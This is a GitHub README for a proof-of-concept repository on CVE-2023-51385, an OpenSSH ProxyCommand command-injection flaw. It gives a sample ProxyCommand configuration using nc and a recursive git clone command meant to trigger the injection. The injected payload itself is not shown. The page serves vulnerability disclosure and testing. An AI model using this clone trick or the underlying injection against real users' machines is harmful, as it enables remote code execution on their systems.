Skip to content

Latest commit

 

History

History
13 lines (11 loc) · 305 Bytes

README.md

File metadata and controls

13 lines (11 loc) · 305 Bytes

CVE-2023-51385

OpenSSH ProxyCommand RCE

  1. When your ProxyCommand is configured as follows:
Host *.com
  ProxyCommand /usr/bin/nc -X connect -x 127.0.0.1:7890 %h %p
  1. Use the following command for proof of concept
git clone https://github.com/Le1a/CVE-2023-51385 --recurse-submodules